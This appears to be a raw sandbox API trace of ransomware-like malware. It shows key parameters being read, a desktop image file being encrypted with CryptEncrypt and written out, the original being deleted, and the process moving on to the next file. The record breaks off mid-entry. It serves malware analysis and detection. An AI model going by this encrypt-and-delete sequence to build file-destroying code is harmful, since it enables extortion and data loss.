0x43cb018 [0129.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0129.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0129.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0129.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0129.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0129.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0129.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0129.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0129.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0129.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0129.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796ea8 [0129.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0129.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0129.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0129.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0129.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0129.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0129.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0129.557] CryptGetKeyParam (in: hKey=0x41ac6c0, dwParam=0x7, pbData=0x43e29b0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e29b0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0129.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0129.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0129.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0129.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0129.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0129.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0129.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0129.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0129.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0129.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0129.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0129.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0129.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0129.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0129.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0129.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0129.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0129.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0129.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0129.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0129.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0129.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0129.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0129.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0129.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0129.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8f00 [0129.581] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0129.581] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.581] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0129.581] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.582] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb090, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0129.582] CryptEncrypt (in: hKey=0x41ac6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x7203, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x7210) returned 1 [0129.582] CharLowerBuffW (in: lpsz="byte[29201]", cchLength=0xb | out: lpsz="byte[29201]") returned 0xb [0129.582] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.582] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb3a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0129.582] CryptEncrypt (in: hKey=0x41ac6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49bf640*, pdwDataLen=0x144e538*=0x7203, dwBufLen=0x7210 | out: pbData=0x49bf640*, pdwDataLen=0x144e538*=0x7210) returned 1 [0129.582] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0129.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0129.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.583] WriteFile (in: hFile=0x258, lpBuffer=0x49e30c8*, nNumberOfBytesToWrite=0x7210, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x49e30c8*, lpNumberOfBytesWritten=0x144ef3c*=0x7210, lpOverlapped=0x0) returned 1 [0129.584] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0129.585] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.585] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0129.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cae68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0129.585] CryptDestroyKey (hKey=0x41ac6c0) returned 1 [0129.585] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0129.585] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0129.585] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.585] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0129.585] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0129.585] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.585] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.585] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0129.585] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0129.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0129.585] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0129.586] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.586] FreeLibrary (hLibModule=0x756e0000) returned 1 [0129.586] CloseHandle (hObject=0x2a0) returned 1 [0129.586] CloseHandle (hObject=0x258) returned 1 [0129.588] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\1aQmLq17nlG1P.bmp", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\1aQmLq17nlG1P.bmp", lpFilePart=0x0) returned 0x36 [0129.588] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\1aQmLq17nlG1P.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\1aqmlq17nlg1p.bmp")) returned 0x20 [0129.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0129.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0129.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0129.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e400 | out: hHeap=0x1780000) returned 1 [0129.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0129.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0129.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0129.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392650 | out: hHeap=0x1780000) returned 1 [0129.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0129.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0129.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0129.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0129.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0129.589] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\1aQmLq17nlG1P.bmp", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7c93870, ftCreationTime.dwHighDateTime=0x1d5f0f3, ftLastAccessTime.dwLowDateTime=0x510b6f50, ftLastAccessTime.dwHighDateTime=0x1d5f0ad, ftLastWriteTime.dwLowDateTime=0x510b6f50, ftLastWriteTime.dwHighDateTime=0x1d5f0ad, nFileSizeHigh=0x0, nFileSizeLow=0x7203, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="1aQmLq17nlG1P.bmp", cAlternateFileName="1AQMLQ~1.BMP")) returned 0x41ac180 [0129.589] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\1aQmLq17nlG1P.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\1aqmlq17nlg1p.bmp")) returned 1 [0129.642] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7c93870, ftCreationTime.dwHighDateTime=0x1d5f0f3, ftLastAccessTime.dwLowDateTime=0x510b6f50, ftLastAccessTime.dwHighDateTime=0x1d5f0ad, ftLastWriteTime.dwLowDateTime=0x510b6f50, ftLastWriteTime.dwHighDateTime=0x1d5f0ad, nFileSizeHigh=0x0, nFileSizeLow=0x7203, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="1aQmLq17nlG1P.bmp", cAlternateFileName="1AQMLQ~1.BMP")) returned 0 [0129.643] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0129.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0129.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0129.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0129.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0129.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d9b0 | out: hHeap=0x1780000) returned 1 [0129.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0129.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0129.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0129.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0129.643] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0129.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0129.643] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0129.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0129.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0129.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0129.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0129.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0129.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0129.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0129.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0129.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0129.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5a98 | out: hHeap=0x1780000) returned 1 [0129.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0129.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0129.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0129.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0129.644] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0129.644] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0129.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0129.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0129.644] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0129.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0129.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0129.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0129.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0129.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0129.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0129.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0129.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0129.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0129.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0129.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0129.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0129.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d18 [0129.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0129.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0129.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0129.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0129.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5358 [0129.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d18 | out: hHeap=0x1780000) returned 1 [0129.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0129.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0129.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0129.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0129.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0129.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0129.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0129.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0129.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0129.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0129.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0129.646] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0129.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0129.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0129.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0129.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0129.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0129.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0129.646] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0129.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0129.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0129.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0129.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0129.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0129.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0129.646] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5N nlGCuCJHLr.gif", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4d3d00, ftCreationTime.dwHighDateTime=0x1d5efef, ftLastAccessTime.dwLowDateTime=0x634a8dc0, ftLastAccessTime.dwHighDateTime=0x1d5e5fb, ftLastWriteTime.dwLowDateTime=0x634a8dc0, ftLastWriteTime.dwHighDateTime=0x1d5e5fb, nFileSizeHigh=0x0, 